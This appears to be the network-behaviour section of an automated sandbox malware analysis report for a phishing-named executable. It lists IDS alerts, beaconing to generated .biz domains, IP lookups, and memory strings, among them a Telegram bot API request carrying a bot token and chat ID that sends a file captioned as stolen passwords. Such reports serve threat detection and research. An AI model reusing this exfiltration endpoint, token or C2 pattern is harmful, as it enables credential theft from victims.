              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49735
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49873
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49873
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49867
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49867
              Source: global trafficHTTP traffic detected: POST /vayts HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: POST /ndknji HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /dy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /un HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: POST /vuox HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: GET /vuox HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /vuox?usid=25&utid=8251791979 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: POST /asgidloooxieajf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: GET /asgidloooxieajf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /asgidloooxieajf?usid=25&utid=8251792691 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: POST /sjqomgqqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /rdnh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /at HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /tcmuebmfxhuj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /jsoiayboaqe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /mmbextsivoeuyvtt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /xoqfqirqhp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /kknpblsbxdrrjko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: POST /wxalwqn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
              Source: global trafficHTTP traffic detected: GET /wxalwqn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.fwiwk.biz
              Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49732 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET /vuox HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /vuox?usid=25&utid=8251791979 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /asgidloooxieajf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /asgidloooxieajf?usid=25&utid=8251792691 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /wxalwqn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.fwiwk.biz
              Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
              Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
              Source: global trafficDNS traffic detected: DNS query: przvgke.biz
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: ww99.przvgke.biz
              Source: global trafficDNS traffic detected: DNS query: ww12.przvgke.biz
              Source: global trafficDNS traffic detected: DNS query: zlenh.biz
              Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
              Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
              Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
              Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
              Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
              Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
              Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
              Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
              Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
              Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
              Source: global trafficDNS traffic detected: DNS query: ww99.fwiwk.biz
              Source: global trafficDNS traffic detected: DNS query: ww7.fwiwk.biz
              Source: unknownHTTP traffic detected: POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1da91996ff1aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
              Source: armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/
              Source: armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/asgidloooxieajf
              Source: armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/asgidloooxieajf:
              Source: armsvc.exe, 00000001.00000003.1840081813.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/asgidloooxieajfN
              Source: armsvc.exe, 00000001.00000003.1723140950.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
              Source: armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/N
              Source: armsvc.exe, 00000001.00000003.1723140950.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ndknji
              Source: armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/3
              Source: armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/I
              Source: armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/n
              Source: armsvc.exe, 00000001.00000003.1764341618.0000000000720000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/un
              Source: armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/un3
              Source: armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/unj
              Source: armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1700090715.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
              Source: armsvc.exe, 00000001.00000003.1744244802.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1744374270.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/dy
              Source: armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/j
              Source: armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/q
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1684737431.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1685750618.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1723140950.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/vayts
              Source: armsvc.exe, armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
              Source: armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/G
              Source: armsvc.exe, 00000001.00000003.2334989969.0000000000720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ath
              Source: armsvc.exe, 00000001.00000003.2101953987.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.000000000071F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2102549025.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/rdnh
              Source: armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/v
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: armsvc.exe, 00000001.00000003.1821807650.0000000002330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzYwMjZjODc4
              Source: armsvc.exe, 00000001.00000003.1834764163.00000000024B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzYwMjZjOWVh
              Source: armsvc.exe, 00000001.00000003.1839091419.0000000000762000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839586338.0000000000757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/asgidloooxieajf?usid=25&utid=8251792691
              Source: armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839586338.0000000000757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/asgidloooxieajf?usid=25&utid=8251792691LocationETagAuthentication-InfoAgeAcc
              Source: armsvc.exe, 00000001.00000003.1839091419.0000000000762000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/vuox?usid=25&utid=8251791979
              Source: armsvc.exe, 00000001.00000003.1840324999.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.bize4-4079-b30a-7368302a1ad4h
              Source: armsvc.exeString found in binary or memory: http://ww99.przvgke.biz/
              Source: armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/asgidloooxieajf
              Source: armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/asgidloooxieajf.
              Source: armsvc.exe, 00000001.00000003.2334989969.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2102549025.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840324999.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/asgidloooxieajf=
              Source: armsvc.exe, 00000001.00000003.1878960828.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2100645926.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1842899589.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2334610256.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/asgidloooxieajfLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedE
              Source: armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/ox
              Source: armsvc.exe, 00000001.00000003.1878960828.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2102437401.0000000000752000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2100645926.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1842899589.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/vuox
              Source: Au3Info_x64.exe.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/
              Source: Au3Info_x64.exe.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/8
              Source: armsvc.exe, 00000001.00000003.1962127671.0000000001F60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839
              Source: Acrobat.exe.1.drString found in binary or memory: https://clients2.google.com/service/update2/crxBrowser
              Source: armsvc.exe, 00000001.00000003.2046016901.0000000000A00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
